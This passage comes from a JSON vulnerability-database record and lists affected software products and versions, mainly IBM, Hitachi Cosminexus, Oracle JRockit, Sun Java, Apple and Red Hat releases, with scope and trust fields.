sp2", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "cosminexus application server standard version 06-02-/g", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "cosminexus developer standard version 06-02-/g", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.35" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.4" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus application server enterprise version 06-51-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.39" }, { "model": "lotus notes fp5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "ucosminexus application server enterprise 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.14" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.22" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0" }, { "model": "jdk 1.5.0 11", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "ucosminexus developer standard 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer light version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-51" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.02" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.4" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "jrockit r28.0.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.3" }, { "model": "network satellite server (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6)5.4" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.17" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "jdk 1.5.0.0 06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.4" }, { "model": "cosminexus application server version 05-00-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "websphere business services fabric", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0" }, { "model": "jre", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "cosminexus client version 06-02-/f", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "epolicy orchestrator", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "5.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus application server enterprise version 06-02-/d", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "jrockit r28.1.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "tivoli dynamic workload console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0" }, { "model": "jrockit r28.2.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.6" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "cosminexus developer version 05-05-/o", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "lotus domino fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.35" }, { "model": "ucosminexus developer standard 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "jdk 1.5.0 11-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "cosminexus client version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-51" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.5" }, { "model": "websphere process server for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "cosminexus developer professional version 06-00-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "vcenter server update1", "scope": "ne", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.4" }, { "model": "powersc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "network and security manager software r4", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "cosminexus developer light version 06-02-/d", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer standard version 06-02-/f", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "update manager update", "scope": "ne", "trust": 0.3, "vendor": "vmware", "version": "5.51" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus developer light version 06-50-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.6.0" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "tivoli storage productivity center fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2" }, { "model": "ucosminexus client 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "linux enterprise server sp4 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.3" }, { "model": "websphere process server hypervisor edition for novell suse", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.3" }, { "model": "rational requisitepro", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.3" }, { "model": "websphere dynamic process edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "lotus domino fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.33" }, { "model": "ucosminexus application server standard 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus developer standard 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus primary server base 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server version 05-00-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "ucosminexus client 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 08", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.15" }, { "model": "cosminexus developer light version 06-51-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server enterprise 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.37" }, { "model": "cosminexus developer standard version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-51" }, { "model": "cosminexus application server enterprise version 06-50-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus application server standard version 06-02-/f", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli provisioning manager for software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.6" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "network and security manager software r6", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.3" }, { "model": "tivoli service automation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.42" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus developer standard version 06-00-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.1" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.2" }, { "model": "ucosminexus application server enterprise 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus domino 8.5.3fp1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "lotus notes fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "cosminexus application server version", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "505-01" }, { "model": "network and security manager software r3", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "linux enterprise server sp2 for vmware", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "lotus domino fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.12" }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "trio tview software", "scope": "eq", "trust": 0.3, "vendor": "schneider electric", "version": "3.27.0" }, { "model": "mac os update", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.617" }, { "model": "jrockit r27.6.0-50", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.015" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "jdk 01", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus developer version 05-00-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "lotus domino fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.13" }, { "model": "db2 recovery expert for linux unix and windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "jrockit r27.7.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.6.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "linux enterprise software development kit sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus application server enterprise (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus client version 06-50-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2.0" }, { "model": "db2 recovery expert for linux unix and windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "network and security manager software", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2-" }, { "model": "lotus domino fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "enterprise linux server eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "ucosminexus developer standard 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus notes fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "tivoli netcool/webtop", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "update manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "websphere process server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.2" }, { "model": "ucosminexus application server standard-r (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "lotus expeditor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "tivoli dynamic workload console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "network satellite server (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5)5.4" }, { "model": "ucosminexus application server standard 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.1" }, { "model": "linux enterprise server sp3 for vmware", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "cosminexus developer light version 06-51-/n", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server standard 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.15" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.1" }, { "model": "cosminexus developer light version 06-02-/g", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "os/400 v6r1m0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "tivoli service automation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2.2" }, { "model": "jdk 1.5.0.0 04", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-71" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.4.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.2" }, { "model": "cosminexus developer professional version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-51" }, { "model": "epolicy orchestrator", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "4.6.7" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.38" }, { "model": "infosphere data replication dashboard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.12" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "jrockit r27.7.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.6" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0" }, { "model": "cosminexus primary server base 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "infosphere data replication dashboard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "linux enterprise server sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.19" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.25" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.5" }, { "model": "websphere application server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.31" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8" }, { "model": "jdk", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.0" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0" }, { "model": "ucosminexus client 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "jdk 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.2" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.3" }, { "model": "ucosminexus application server standard 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.35" }, { "model": "jrockit r28.0.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.21" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "cosminexus application server version 05-00-/s", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus application server standard version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-51" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.8" }, { "model": "cosminexus primary server base 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.4" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "ucosminexus application server enterprise 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.14" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-71" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.19" }, { "model": "jrockit r27.6.7", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.6.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.1" }, { "model": "cosminexus studio version", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "505-01" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "jre 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.23" }, { "model": "websphere dynamic process edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "satellite (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6)5.6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.10" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "13.10" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.11" }, { "model": "ucosminexus client 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional version 06-51-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "linux enterprise java sp2", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2143" }, { "model": "cosminexus developer standard version 06-51-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server enterprise 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.3" }, { "model": "cosminexus developer light version 06-51-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.4.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli dynamic workload console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.4" }, { "model": "ucosminexus application server express (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.170" }, { "model": "cosminexus primary server base 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.4" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "tivoli service automation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "enterprise linux hpc node supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.5" }, { "model": "lotus notes fix pack", 